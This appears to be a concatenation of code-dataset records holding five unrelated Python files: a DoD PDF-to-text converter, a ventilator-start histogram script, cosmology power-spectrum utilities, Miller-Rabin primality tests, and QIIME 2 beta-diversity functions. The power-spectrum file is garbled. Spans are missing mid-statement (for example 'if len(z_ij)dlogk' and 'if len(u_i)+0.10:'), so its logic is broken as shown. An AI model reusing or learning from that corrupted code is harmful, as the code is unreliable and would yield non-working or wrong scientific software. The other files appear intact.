-*-\n\"\"\"\nCreated on Thu May 3 14:53:49 2018\n\n@author: j2\n\nchange DoD pdf to txt - do for 2011\nchange to pypdf2\n\n\"\"\"\nimport PyPDF2\nfrom bs4 import BeautifulSoup\nimport nltk\nimport re\n\npdf_file = open('DOD2011.pdf','rb')\nfout = open('DOD2011.txt','wt')\nread_pdf = PyPDF2.PdfFileReader(pdf_file)\nsoup = BeautifulSoup(\"\", \"lxml\")\n# regex of printable characters\n\nnum_pages = read_pdf.getNumPages()\npages=[]\n\nraw_text = \"\"\ntt = \"\"\ntext=\"\"\n\n\nfor i in range(0,num_pages):\n page = read_pdf.getPage(i)\n pages.append(page)\n \nfor i in range(len(pages)):\n # print(pages[i].extractText())\n t = pages[i].extractText()\n soup = BeautifulSoup(t)\n text_parts = soup.findAll(text=True)\n text = ' '.join(text_parts)\n for j in range(len(text)):\n if text[j].isprintable():\n tt = tt+text[j]\n \n raw_text = raw_text + tt + ' '\n\nfout.write(raw_text)\n\nfout.close()\npdf_file.close()\n\n \n\n\n\n\n","sub_path":"DoDconvert2.py","file_name":"DoDconvert2.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"552215916","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndf = pd.read_excel('C:\\\\Users\\\\ird8185\\\\Downloads\\\\Vent Detail.xlsx',\n skiprows=[0, 1]) # import Sepsis Patient Detail from Microstrategy and skips first two rows\ndf=df[(df['Actual/Billed Indicator']=='Actual')]\n\ntimegroup=df.reindex(columns=['Actual Vent Start Date/Time'])\ntimegroup = timegroup.groupby(by=[df['Actual Vent Start Date/Time'].map(lambda x : (x.hour))],as_index=False).count()\ntimegroup = timegroup.reset_index()\n\nplt.bar(timegroup['index'],timegroup['Actual Vent Start Date/Time'],color='dodgerblue', edgecolor='black', align='center')\nplt.title('Vent Start Histogram')\nplt.ylabel('# Cases (Six Months Meditech)')\nplt.xlabel('Hour of Day')\n\nplt.show()\n\nprint (timegroup)\n","sub_path":"Vent Histogram.py","file_name":"Vent Histogram.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"602919559","text":"#!/usr/bin/python\nfrom __future__ import print_function\nimport os\nimport sys\nfrom numpy import *\nimport struct\nimport math\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nfrom scipy import integrate\nimport itertools\nimport params_power as par\n\nshot = 0\n\n########## Powerfile Finder function ##########\n\ndef finder (in_dir,base,flag,ptype=None):\n \"Finds the powerfiles to read, both for camb and p-power files.\"\n\n # internal variables\n\n z = []\n if flag=='camb':\n end=\".dat\"\n elif flag=='gev':\n end=\"deltaN.dat\"\n else:\n end=\".txt\"\n \n # function\n \n a = os.listdir (in_dir)\n a = compress(list(x.startswith(base) and x.endswith(end) for x in a),a)\n\n if ptype != None:\n a = compress(list( 'type'+str(ptype) in x for x in a),a)\n\n if flag=='camb':\n a = compress(list('matterpower' in x for x in a),a)\n \n if flag=='camb':\n z=list(float(x[x.index('z')+1:-4]) for x in a)\n elif flag=='gev':\n for x in a:\n f=open(in_dir+x,'r')\n line=f.readline() #discard first line\n line=f.readline()\n f.close()\n if 'redshift' in line:\n z.append(round(float(line[line.index('=')+1:]),1))\n else:\n print('Second line in gev_powerfile is not the redshift one, check it!')\n exit() \n else:\n for x in a:\n f=open(in_dir+x,'r')\n z.append(round(1/float(f.readline().strip())-1,2))\n f.close()\n\n a = [x for (y,x) in sorted(zip(z,a),reverse=True)]\n z = sorted(z,reverse=True)\n\n\n if len(a)==0:\n for d in os.listdir(in_dir):\n if os.path.isdir(in_dir+d):\n d = d + '/'\n b,w = finder(in_dir+d,base,flag,False)\n z = z + w\n a = a + [d+e for e in b]\n \n if len(a)==0:\n return [],[]\n\n if sys.flags.debug:\n print (\"\\nIn\",in_dir,)\n print (\"I found\",len(a),flag,\"power files\")\n print (\"with redshifts: \",z)\n \n return a,z\n\n########### Redshift check ##########\n\ndef z_check (p_i,z_i,p_j,z_j):\n \"Checks wheter there are compatible redshifts or not. In case, selects the ones that match.\"\n\n # internal variables\n\n tolerance=0.01\n z_ij=[]\n p_i_temp=[]\n p_j_temp=[]\n \n # function\n \n for i in z_i:\n for j in z_j:\n if abs(i-j)<=tolerance and round((i+j)/2.,2) not in z_ij and round((i+j)/2.,2) not in par.skip_z:\n z_ij.append(round((i+j)/2.,2))\n p_i_temp.append(p_i[z_i.index(i)])\n p_j_temp.append(p_j[z_j.index(j)])\n \n p_i=p_i_temp\n p_j=p_j_temp\n \n if len(z_ij) > 0:\n \n if len(z_ij)dlogk and count[istart:i+1].sum()>mincount:\n s_arr.k[i+1] = average(k[istart:i+1],weights=count[istart:i+1])\n s_arr.Pk[i+1] = average(Pk[istart:i+1],weights=count[istart:i+1])\n s_arr.count[i+1] = count[istart:i+1].sum()\n \n istart=i+1\n BU.append(i)\n\n else:\n\n for i in BI:\n \n s_arr.k[i+1] = average(k[istart:i+1],weights=count[istart:i+1])\n s_arr.Pk[i+1] = average(Pk[istart:i+1],weights=count[istart:i+1])\n s_arr.count[i+1] = count[istart:i+1].sum()\n \n istart=i+1\n BU.append(i)\n \n s_arr=s_arr[~(s_arr.Pk==0)]\n \n #print(BI)\n #print(BU)\n\n return s_arr, BU\n\n########## Powerfile Reader function ##########\n\ndef gadget_reader(in_dir,powerfile,flag,BI):\n \"Reads the standard format of p-power file, for G2 or G3\"\n\n # internal variables\n\n global shot\n \n databin1=[]\n databin2=[]\n databin=[]\n databintot=[]\n\n # function\n \n f=open(in_dir+powerfile,'r')\n lines=f.readlines()\n f.close()\n\n redshift_string=str(round(1/float(lines[0])-1,2))\n lines.pop(0)\n NumBins=int(lines[0])\n lines.pop(0)\n\n if flag=='G3':\n dummy=lines[0]\n lines.pop(0)\n dummy=lines[0]\n lines.pop(0)\n\n data1=array([u.split() for u in lines[:NumBins]]).astype('float')\n data2=array([u.split() for u in lines[NumBins+2*(1+int(flag=='G3')):]]).astype('float')\n\n data1 = data1[~(data1[:,1] == 0)]\n data2 = data2[~(data2[:,1] == 0)]\n \n data1[:,0:2] = array([converter(flag,0) (x,y) for (x,y) in data1[:,0:2] ])\n data2[:,0:2] = array([converter(flag,0) (x,y) for (x,y) in data2[:,0:2] ])\n \n print ('\\nReading',powerfile,'of Z =',redshift_string)\n \n ## the file format is:\n ## 4 lines with Time, Tot#K and two dummy (only > Gadget2) variables respectively\n ## Tot#K lines with K,D**2,Shot,ModePow,ModeCount,D**2Raw,ModePowRaw,SpecShape,SumPow,ConvFactor\n ## this repeated two times, one for the top_layer and one for the bottom_layer\n\n\n data=vstack((data1,data2))\n \n data=data[argsort(data[:,0])]\n \n shot=interpolate.interp1d(data[:,0],data[:,2],bounds_error=False,fill_value=-100)\n\n # this to make sure that strange features come up again at high k in the PS once the are below the shot\n # sometimes happens at very homogeneous states\n if par.power_cut_shot==True:\n for i in range(shape(data)[0]):\n if data[i,1] < 0.5 * data[i,2]:\n data=data[:i]\n break\n \n databin, BI = binning(data[:,0],data[:,1],data[:,4],BI)\n\n databin.Pk=smooth(databin.Pk,par.databin_smoothing)\n\n if par.power_cut_shot==True:\n databin = databin[(databin.Pk >= shot(databin.k))]\n\n print (\"Number of bins in the joint layer: \",shape(databin)[0])\n \n \n '''\n shot_1=interpolate.interp1d(data1[:,0],data1[:,2],bounds_error=False,fill_value=-100)\n shot_2=interpolate.interp1d(data2[:,0],data2[:,2],bounds_error=False,fill_value=-100)\n \n # Bottom Layer Binning\n\n if len(data1)>0:\n databin1=binning(data1[:,0],data1[:,1],data1[:,4])\n\n if par.power_cut_shot==True:\n databin1 = databin1[(databin1.Pk >= shot_1(databin1.k))]\n\n # Top Layer Binning\n\n if len(data2)>0:\n databin2=binning(data2[:,0],data2[:,1],data2[:,4])\n\n if par.power_cut_shot==True:\n databin2 = databin2[(databin2.Pk >= shot_2(databin2.k))]\n \n # Cut & Paste of the two binned sets\n\n if len(data1)*len(data2)!=0:\n databin=concatenate((databin2,databin1[(databin1.k>databin2.k.max())]))\n else:\n if len(data1)==0:\n if len(data2)==0:\n print(\"data1 == data2 == 0\")\n exit()\n databin=databin2\n else:\n databin=databin1 \n\n databin=array(databin,dtype=[('k',float),('Pk',float),('count',int)]).view(recarray)\n\n print (\"Number of bins in the upper | bottom | joint layer: \",shape(databin2)[0],shape(databin1)[0],shape(databin)[0])\n\n ''' \n \n # Interpolations\n\n fn=interpolate.interp1d(databin.k,databin.Pk,bounds_error=False,fill_value=-100)\n \n return databin,fn,BI\n\n########### Gevolution Reader ###########\n\ndef gev_reader (in_dir,powerfile,BI):\n \"Reads the powerspectrum file from Gevolution\"\n\n print ('\\n','Reading ',powerfile)\n \n f=open(in_dir+powerfile,'r')\n lines=f.readlines()\n f.close()\n \n P=array(zeros(len(lines)-3),dtype=[('k',float),('Pk',float),('count',int)]).view(recarray)\n err=zeros(len(lines)-3)\n \n for u in lines:\n \n if lines.index(u)<=2:\n if 'redshift' in u:\n redshift_string=str(round(float(u[u.index('=')+1:]),1))\n continue\n \n P.k[lines.index(u)-3] =u.split()[0]\n P.Pk[lines.index(u)-3] =u.split()[1]\n err[lines.index(u)-3] =u.split()[3]\n P.count[lines.index(u)-3]=u.split()[4]\n\n print (\"This is the power file at redshift: \"+redshift_string)\n \n P.k=P.k#*par.Units_conversion_factor\n P.Pk=(2*pi*pi*P.Pk)/(P.k**3)*(10)#*((0.8159)/(1.05023189e-2))**2 # A MANOOOOOOOO\n\n P, BI =binning(P.k,P.Pk,P.count,BI)\n\n print( \"Number of bins in the gev binned spectrum: \",len(P))\n\n fn=interpolate.interp1d(P.k,P.Pk,bounds_error=False,fill_value=-100)\n\n return P,fn\n\n########### Camb reader ##########\n\ndef camb_reader (in_dir,powerfile,BI):\n \"Reads the standard camb file\"\n\n # internal variables\n \n redshift_string=powerfile[powerfile.index('z')+1:-4]\n\n # function\n\n print ('\\n','Reading ',powerfile)\n print (\"This is the power file at redshift: \"+redshift_string)\n \n f=open(in_dir+powerfile,'r')\n lines=f.readlines()\n f.close()\n\n s_arr=array(zeros(len(lines)),dtype=[('k',float),('Pk',float),('count',int)]).view(recarray)\n \n for u in lines:\n if '#' in u:\n continue\n s_arr.k[lines.index(u)] = float(u.split()[0]) #/ ((float(redshift_string)+1)/(1101))**0.25\n s_arr.Pk[lines.index(u)]= float(u.split()[1]) #* (float(redshift_string)+1)**0.75\n\n print( \"Number of points in the camb spectrum: \",len(s_arr))\n \n fn=interpolate.interp1d(s_arr.k,s_arr.Pk,bounds_error=False,fill_value=-100)\n\n return s_arr,fn\n\n########### Sigma 8 calculator ###########\n\ndef sigma8(data):\n \"Compute sigma8 for an array of k,Pk in Mpc lenght units\"\n \n R=8.0 # R is the window radius, for sigma8 is R = 8 Mpc \n\n fn_s8=interpolate.interp1d(data[:,0],data[:,1],bounds_error=False)\n \n def integ(k):\n Pk = fn_s8(k)\n if k*R < 1.0e-8:\n return 0.\n else:\n return 36. * pi * Pk / (k**2 * R**4) * ( sin(k*R)/(k*R) - cos(k*R) )**2\n \n s8=sqrt(integrate.romberg(integ,0,data[-1,0],show=False,divmax=12))\n \n return s8\n\n########## Power file converter ##########\n\ndef converter(flag,mode):\n \"Return a lambda function that map flag-type-file data into k[Mpc^-1],Pk[Mpc^3]. The direction of the mapping is given by mode parameter.\"\n\n unit=par.Units_conversion_factor\n \n # Reading data and map into ( k[Mpc^-1], Pk[Mpc^3] )\n if mode==0 or mode=='r':\n if flag=='camb':\n return (lambda x,y : (x,y))\n elif flag=='genic_in':\n return (lambda x,y : (pow(10,x)/unit,pow(10,y-3*x)*2.*pi**2))\n elif flag=='genic_out' or 'G2' or 'G3':\n return (lambda x,y : (x/unit, 2. * pi**2 * y / ((x/unit)**3)))\n #elif flag=='':\n else:\n print(\"%s is not recognized\",flag)\n exit()\n \n # Writing data mapped from ( k[Mpc^-1], Pk[Mpc^3] )\n elif mode==1 or mode=='w':\n if flag=='camb':\n return (lambda x,y : (x,y))\n elif flag=='genic_in':\n return (lambda x,y : (log10(x*unit),3*log10(x*unit) + log10(y)-log10(2.*pi**2)))\n elif flag=='genic_out' or 'G2' or 'G3':\n return (lambda x,y : (x*unit,x**3 * y / 2. / pi**2 ))\n #elif flag=='':\n else:\n print(\"%s is not recognized\",flag)\n exit()\n\n########### Loading powerfile ##########\n\ndef power_load (in_dir,filename,flag,s8norm=-1):\n \"Reads the k,Pk array into a file of flag format\"\n \n f=open(in_dir+filename,'r')\n lines=f.readlines()\n f.close()\n\n n=0\n if (flag=='genic_out'): n=1\n while ('#' in lines[n]):\n n=n+1\n \n data=array([u.split() for u in lines[n:]]).astype('float')\n data=data[:,0:2]\n \n data[:] = array([converter(flag,0) (x,y) for (x,y) in data[:] ])\n\n sigma8_data=sigma8(data)\n \n print('Reading...',filename,'has',shape(data),'lines. Sigma8 found is',sigma8_data)\n\n if s8norm!=-1:\n print('Normalized at',s8norm,'with factor',(s8norm/sigma8_data)**2)\n data[:,1]=data[:,1]*(s8norm/sigma8_data)**2\n sigma8_data=s8norm\n\n if par.plot_check==True:\n if par.plot_delta==False:\n plt.loglog(data[:,0],data[:,1],label=filename)\n else:\n plt.loglog(data[:,0],data[:,1]*power(data[:,0],3)/(2*pi**2),label=filename)\n \n return data,sigma8_data\n\n########### Saving powerfile ###########\n\ndef power_save (in_dir,filename,data,flag):\n \"Writes the k,Pk array into a file of flag format\"\n \n temp=copy(data)\n \n sigma8_data=sigma8(temp)\n \n temp[:] = array([converter(flag,1) (x,y) for (x,y) in temp[:] ])\n\n print('Writing...',filename,'has',shape(temp),'lines. Sigma8 original is',sigma8_data)\n\n while (os.path.isfile(in_dir+filename)):\n print(in_dir+filename,'already exists.')\n test = raw_input('Return to overwrite or type a new filename:\\n')\n if not test:\n break\n else:\n filename=test\n \n savetxt(in_dir+filename,temp)\n\n del temp\n \n return filename\n\n########### Plotting databins ##########\n\ndef plot_databins(col,labelname,*db):\n \"Plots the powerspectrum of one or two databins\"\n\n # internal variables\n\n ax=plt.gca()\n\n #function\n\n if par.plot_delta==True:\n db[0].Pk = db[0].Pk * power(db[0].k,3)/(2*pi**2)\n if len(db)==2:\n db[1].Pk = db[1].Pk * power(db[1].k,3)/(2*pi**2)\n \n if len(db)==2:\n ax.plot(log10(db[0].k),log10(db[0].Pk),ls='solid',label=labelname,c=col)\n ax.plot(log10(db[1].k),log10(db[1].Pk),ls='--',c=col)\n\n if len(db)==1:\n ax.plot(log10(db[0].k),log10(db[0].Pk),ls='solid',label=labelname,c=col)\n\n if par.plot_shot==True:\n ax.plot(log10(db[0].k),log10(shot(db[0].k)),ls='solid',c='k')\n \n if par.adaptive_power_axis[0]!=True :\n ax.set_xlim(xmin=par.power_x_ax[0], xmax=par.power_x_ax[1])\n \n if par.adaptive_power_axis[1]!=True :\n ax.set_ylim(ymin=par.power_y_ax[0], ymax=par.power_y_ax[1])\n\n\n if par.plot_diff==False:\n ax.set_xlabel('$log_{10} \\ k \\ [h Mpc^{-1}]$')\n\n ax.legend(loc='best')#,labelspacing=0.2,fontsize='small') \n\n if par.plot_delta==True:\n ax.set_ylabel('$log_{10} \\ \\Delta^2 $')\n else:\n ax.set_ylabel('$\\log_{10} \\ P(k) \\ [Mpc^{-3}]$')\n\n\n########## plot difference functions ########\n\ndef plot_interpolated_difference(db_i,db_j,fn_i,fn_j,col,name_i,name_j,labelname=None):\n \"Plots the difference between two powerspectrum, using the interpolated functions\"\n\n # internal variables\n \n ylabel=r'$P(k)_{'+name_i+'}\\ / \\ P(k)_{'+name_j+'}\\ - \\ 1 \\ [\\%] $'\n if labelname==None:\n labelname=name_i\n if name_j!='':\n labelname=labelname+'/'+name_j\n ylabel=r'$P(k)_{i}\\ / \\ P(k)_{CDM}\\ - \\ 1 \\ [\\%] $'\n \n ax=plt.gca()\n \n # functions\n\n top=min(db_i.k.max(),db_j.k.max())\n bottom=max(db_i.k.min(),db_j.k.min())\n u_i=compress(list(x<=top and x>=bottom for x in db_i.k),db_i.k)\n u_j=compress(list(x<=top and x>=bottom for x in db_j.k),db_j.k)\n \n ax.set_xlabel(r'$\\log_{10} \\ k \\ [h Mpc^{-1}]$')\n ax.set_ylabel(ylabel)\n\n if len(u_i)+0.10:\n ax.axhline(+0.10, color='0.75', alpha=0.5, lw=1,ls=':')\n if plt.ylim()[1]>+1.0:\n ax.set_ylim(plt.ylim()[0],+1.0)\n \"\"\"\n if plt.ylim()[0]*plt.ylim()[1]<0.0:\n ax.axhline(0.0, color='0.5', alpha=0.5, lw=1,ls=':')\n\n if par.adaptive_power_axis[0]!=True :\n ax.set_xlim(xmin=par.power_x_ax[0], xmax=par.power_x_ax[1])\n\n if par.adaptive_power_axis[2]!=True :\n ax.set_ylim(ymin=par.power_diff_y_ax[0], ymax=par.power_diff_y_ax[1])\n \n###########\n\ndef reader(in_dir,f,flag,BI=[]):\n \"Function overload between camb or p-power reader\"\n\n if flag=='camb':\n db,fn=camb_reader(in_dir,f,BI)\n elif flag=='G2' or flag=='G3':\n db,fn,BI=gadget_reader(in_dir,f,flag,BI)\n elif flag=='gev':\n db,fn,BI=gev_reader(in_dir,f,BI)\n \n return db,fn,BI\n\ndef smooth(y, box_pts):\n box_pts = min(len(y),box_pts)\n box = ones(box_pts)/box_pts\n y_smooth = convolve(y, box, mode='same')\n return y_smooth\n","sub_path":"functions_power.py","file_name":"functions_power.py","file_ext":"py","file_size_in_byte":18158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"526857468","text":"# Probablistic primality testing\n\nfrom ..Algorithms import FastPower\nfrom math import log10, log, floor\nfrom .primes import *\n\ndef FermatTest(a, n):\n '''\n Peforms the Fermat Test to see if Fermat's Little Theorem holds for a^(n-1) = 1 mod n\\n\n Inputs:\n integers a, n\n Output:\n boolean f (false if composite, true if \"probably prime\")\n '''\n f = FastPower(a, n-1, n)\n return f == 1\n\ndef MillerRabin(n, warnings=False):\n '''\n Performs the Miller-Rabin Test on possible prime n\\n\n Input:\n integers n\n boolean warnings (optional, show warnings)\n Outputs:\n boolean m (false if composite, true if \"probably prime\")\n '''\n #https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test#Accuracy\n \n # If the generalized Riemann hypothesis is true, Miller-Rabin can be made deterministic\n if not n > 1:\n raise Exception('MillerRabin(): n must be strictly greater than 1')\n # Express as n = 2^r*d + 1\n d = n - 1\n r = 0\n while d % 2 == 0:\n r += 1\n d = d // 2\n \n witnessRange = min([n-2, floor(2*(log(n)**2))])\n aIndex = 0\n while smallPrimes[aIndex] < witnessRange:\n x = FastPower(smallPrimes[aIndex], d, n)\n if x == 1 or x == n-1:\n # Failure to find a witness\n aIndex += 1\n if aIndex == len(smallPrimes):\n if warnings:\n print('List of small primes for Miller-Rabin bases has been exhausted for n=' + str(n))\n print('The result is probabalistically determined to be prime.')\n return True\n continue\n failure = False\n for i in range(r - 1):\n x = FastPower(x, 2, n)\n if x == n-1:\n # Failure to find a witness\n aIndex += 1\n if aIndex == len(smallPrimes):\n if warnings:\n print('List of small primes for Miller-Rabin bases has been exhausted for n=' + str(n))\n print('The result is probabalistically determined to be prime.')\n return True\n failure = True\n if not failure:\n return False\n return True\n\ndef IsPrime(n):\n '''\n Determines probabalistically if a number is prime\\n\n Input:\n integer n\n Outputs:\n boolean p (false if composite, true if \"probably prime\")\n '''\n if n % 2 == 0 and n != 2:\n return False\n\n length = log10(n)\n\n if length < 4:\n # Use lookup table\n if n in smallPrimes:\n return True\n else:\n return False\n else:\n return MillerRabin(n)\n\ndef IsSophieGermainPrime(n):\n '''\n Determines whether n is a Sophie Germain prime, that is, it is a prime such that 2n+1 is also prime\\n\n Input:\n integer n\n Output:\n boolean s\n '''\n if not IsPrime(n):\n return False\n if not IsPrime(2*n + 1):\n return False\n return True","sub_path":"Primality/Primality.py","file_name":"Primality.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219757458","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2016-2018, QIIME 2 development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport os.path\nimport collections\nimport urllib.parse\nimport pkg_resources\nimport itertools\n\nimport skbio\nimport skbio.diversity\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom statsmodels.sandbox.stats.multicomp import multipletests\nimport qiime2\nimport q2templates\nfrom natsort import natsorted\n\n\nTEMPLATES = pkg_resources.resource_filename('q2_diversity', '_beta')\n\n\ndef bioenv(output_dir: str, distance_matrix: skbio.DistanceMatrix,\n metadata: qiime2.Metadata) -> None:\n # Filter metadata to only include IDs present in the distance matrix.\n # Also ensures every distance matrix ID is present in the metadata.\n metadata = metadata.filter_ids(distance_matrix.ids)\n\n # drop non-numeric columns and empty columns\n pre_filtered_cols = set(metadata.columns)\n metadata = metadata.filter_columns(column_type='numeric')\n non_numeric_cols = pre_filtered_cols - set(metadata.columns)\n\n # filter 0 variance numerical columns and empty columns\n pre_filtered_cols = set(metadata.columns)\n metadata = metadata.filter_columns(drop_zero_variance=True,\n drop_all_missing=True)\n zero_variance_cols = pre_filtered_cols - set(metadata.columns)\n\n # Drop samples that have any missing values.\n # TODO use Metadata API if this type of filtering is supported in the\n # future.\n df = metadata.to_dataframe()\n df = df.dropna(axis='index', how='any')\n\n # filter the distance matrix to exclude samples that were dropped from\n # the metadata, and keep track of how many samples survived the filtering\n # so that information can be presented to the user.\n initial_dm_length = distance_matrix.shape[0]\n distance_matrix = distance_matrix.filter(df.index)\n filtered_dm_length = distance_matrix.shape[0]\n\n result = skbio.stats.distance.bioenv(distance_matrix, df)\n result = q2templates.df_to_html(result)\n\n index = os.path.join(TEMPLATES, 'bioenv_assets', 'index.html')\n q2templates.render(index, output_dir, context={\n 'initial_dm_length': initial_dm_length,\n 'filtered_dm_length': filtered_dm_length,\n 'non_numeric_cols': ', '.join(sorted(non_numeric_cols)),\n 'zero_variance_cols': ', '.join(sorted(zero_variance_cols)),\n 'result': result})\n\n\n_beta_group_significance_fns = {'permanova': skbio.stats.distance.permanova,\n 'anosim': skbio.stats.distance.anosim,\n 'permdisp': skbio.stats.distance.permdisp}\n\n\ndef _get_distance_boxplot_data(distance_matrix, group_id, groupings):\n x_ticklabels = []\n all_group_distances = []\n\n # extract the within group distances\n within_group_distances = []\n pairs_summary = []\n group = groupings[group_id]\n for i, sid1 in enumerate(group):\n for sid2 in group[:i]:\n dist = distance_matrix[sid1, sid2]\n within_group_distances.append(dist)\n pairs_summary.append((sid1, sid2, group_id, group_id, dist))\n x_ticklabels.append('%s (n=%d)' %\n (group_id, len(within_group_distances)))\n all_group_distances.append(within_group_distances)\n\n # extract between group distances for group to each other group\n for other_group_id, other_group in groupings.items():\n between_group_distances = []\n if group_id == other_group_id:\n continue\n for sid1 in group:\n for sid2 in other_group:\n dist = distance_matrix[sid1, sid2]\n between_group_distances.append(dist)\n pairs_summary.append(\n (sid1, sid2, group_id, other_group_id, dist))\n x_ticklabels.append('%s (n=%d)' %\n (other_group_id, len(between_group_distances)))\n all_group_distances.append(between_group_distances)\n return all_group_distances, x_ticklabels, pairs_summary\n\n\ndef _get_pairwise_group_significance_stats(\n distance_matrix, group1_id, group2_id, groupings, metadata,\n beta_group_significance_fn, permutations):\n group1_group2_samples = groupings[group1_id] + groupings[group2_id]\n metadata = metadata[group1_group2_samples]\n distance_matrix = distance_matrix.filter(group1_group2_samples)\n return beta_group_significance_fn(distance_matrix, metadata,\n permutations=permutations)\n\n\ndef beta_group_significance(output_dir: str,\n distance_matrix: skbio.DistanceMatrix,\n metadata: qiime2.CategoricalMetadataColumn,\n method: str = 'permanova',\n pairwise: bool = False,\n permutations: int = 999) -> None:\n try:\n beta_group_significance_fn = _beta_group_significance_fns[method]\n except KeyError:\n raise ValueError('Unknown group significance method %s. The available '\n 'options are %s.' %\n (method,\n ', '.join(_beta_group_significance_fns)))\n\n # Filter metadata to only include IDs present in the distance matrix.\n # Also ensures every distance matrix ID is present in the metadata.\n metadata = metadata.filter_ids(distance_matrix.ids)\n metadata = metadata.drop_missing_values()\n\n # filter the distance matrix to exclude samples that were dropped from\n # the metadata due to missing values, and keep track of how many samples\n # survived the filtering so that information can be presented to the user.\n initial_dm_length = distance_matrix.shape[0]\n distance_matrix = distance_matrix.filter(metadata.ids)\n filtered_dm_length = distance_matrix.shape[0]\n\n metadata = metadata.to_series()\n\n # Run the significance test\n result = beta_group_significance_fn(distance_matrix, metadata,\n permutations=permutations)\n\n # Generate distance boxplots\n sns.set_style('white')\n # Identify the groups, then compute the within group distances and the\n # between group distances, and generate one boxplot per group.\n # groups will be an OrderedDict mapping group id to the sample ids in that\n # group. The order is used both on the x-axis, and in the layout of the\n # boxplots in the visualization.\n # TODO: update to use a grouping API and natsort API on\n # CategoricalMetadataColumn, if those become available.\n groupings = collections.OrderedDict(\n [(id, list(series.index))\n for id, series in natsorted(metadata.groupby(metadata))])\n\n pairs_summary = pd.DataFrame(columns=['SubjectID1', 'SubjectID2', 'Group1',\n 'Group2', 'Distance'])\n for group_id in groupings:\n group_distances, x_ticklabels, group_pairs_summary = \\\n _get_distance_boxplot_data(distance_matrix, group_id, groupings)\n\n group_pairs_summary = pd.DataFrame(\n group_pairs_summary, columns=['SubjectID1', 'SubjectID2',\n 'Group1', 'Group2', 'Distance'])\n\n pairs_summary = pd.concat([pairs_summary, group_pairs_summary])\n\n ax = sns.boxplot(data=group_distances, flierprops={\n 'marker': 'o', 'markeredgecolor': 'black', 'markeredgewidth': 0.5,\n 'alpha': 0.5})\n ax.set_xticklabels(x_ticklabels, rotation=90)\n ax.set_xlabel('Group')\n ax.set_ylabel('Distance')\n ax.set_title('Distances to %s' % group_id)\n # change the color of the boxes to white\n for box in ax.artists:\n box.set_facecolor('white')\n sns.despine()\n plt.tight_layout()\n fig = ax.get_figure()\n fig.savefig(os.path.join(output_dir, '%s-boxplots.png' %\n urllib.parse.quote_plus(str(group_id))))\n fig.savefig(os.path.join(output_dir, '%s-boxplots.pdf' %\n urllib.parse.quote_plus(str(group_id))))\n fig.clear()\n\n pairs_summary.to_csv(os.path.join(output_dir, 'raw_data.tsv'), sep='\\t')\n\n result_html = q2templates.df_to_html(result.to_frame())\n\n if pairwise:\n pairwise_results = []\n for group1_id, group2_id in itertools.combinations(groupings, 2):\n pairwise_result = \\\n _get_pairwise_group_significance_stats(\n distance_matrix=distance_matrix,\n group1_id=group1_id,\n group2_id=group2_id,\n groupings=groupings,\n metadata=metadata,\n beta_group_significance_fn=beta_group_significance_fn,\n permutations=permutations)\n pairwise_results.append([group1_id,\n group2_id,\n pairwise_result['sample size'],\n permutations,\n pairwise_result['test statistic'],\n pairwise_result['p-value']])\n columns = ['Group 1', 'Group 2', 'Sample size', 'Permutations',\n result['test statistic name'], 'p-value']\n pairwise_results = pd.DataFrame(pairwise_results, columns=columns)\n pairwise_results.set_index(['Group 1', 'Group 2'], inplace=True)\n pairwise_results['q-value'] = multipletests(\n pairwise_results['p-value'], method='fdr_bh')[1]\n pairwise_results.sort_index(inplace=True)\n pairwise_path = os.path.join(\n output_dir, '%s-pairwise.csv' % method)\n pairwise_results.to_csv(pairwise_path)\n\n pairwise_results_html = q2templates.df_to_html(pairwise_results)\n else:\n pairwise_results_html = None\n\n # repartition groupings for rendering\n group_ids = list(groupings.keys())\n row_count, group_count = 3, len(group_ids) # Start at three plots per row\n while group_count % row_count != 0:\n row_count = row_count - 1\n\n group_rows = [group_ids[g:g+row_count] for g in range(0, group_count,\n row_count)]\n\n index = os.path.join(\n TEMPLATES, 'beta_group_significance_assets', 'index.html')\n q2templates.render(index, output_dir, context={\n 'initial_dm_length': initial_dm_length,\n 'filtered_dm_length': filtered_dm_length,\n 'method': method,\n 'group_rows': group_rows,\n 'bootstrap_group_col_size': int(12 / row_count),\n 'result': result_html,\n 'pairwise_results': pairwise_results_html\n })\n\n\ndef mantel(output_dir: str, dm1: skbio.DistanceMatrix,\n dm2: skbio.DistanceMatrix, method: str = 'spearman',\n permutations: int = 999, intersect_ids: bool = False,\n label1: str = 'Distance Matrix 1',\n label2: str = 'Distance Matrix 2') -> None:\n test_statistics = {'spearman': 'rho', 'pearson': 'r'}\n alt_hypothesis = 'two-sided'\n\n # The following code to handle mismatched IDs, and subsequently filter the\n # distance matrices, is not technically necessary because skbio's mantel\n # function will raise an error on mismatches with `strict=True`, and will\n # handle intersection if `strict=False`. However, we need to handle the ID\n # matching explicitly to find *which* IDs are mismatched -- the error\n # message coming from scikit-bio doesn't describe those. We also need to\n # have the mismatched IDs to display as a warning in the viz if\n # `intersect_ids=True`. Finally, the distance matrices are explicitly\n # filtered to matching IDs only because their data are used elsewhere in\n # this function (e.g. extracting scatter plot data).\n\n # Find the symmetric difference between ID sets.\n ids1 = set(dm1.ids)\n ids2 = set(dm2.ids)\n mismatched_ids = ids1 ^ ids2\n\n if not intersect_ids and mismatched_ids:\n raise ValueError(\n 'The following ID(s) are not contained in both distance matrices. '\n 'This sometimes occurs when mismatched files are passed. If this '\n 'is not the case, you can use `intersect_ids` to discard these '\n 'mismatches and apply the Mantel test to only those IDs that are '\n 'found in both distance matrices.\\n\\n%s'\n % ', '.join(sorted(mismatched_ids)))\n\n if mismatched_ids:\n matched_ids = ids1 & ids2\n # Run in `strict` mode because the matches should all be found in both\n # matrices.\n dm1 = dm1.filter(matched_ids, strict=True)\n dm2 = 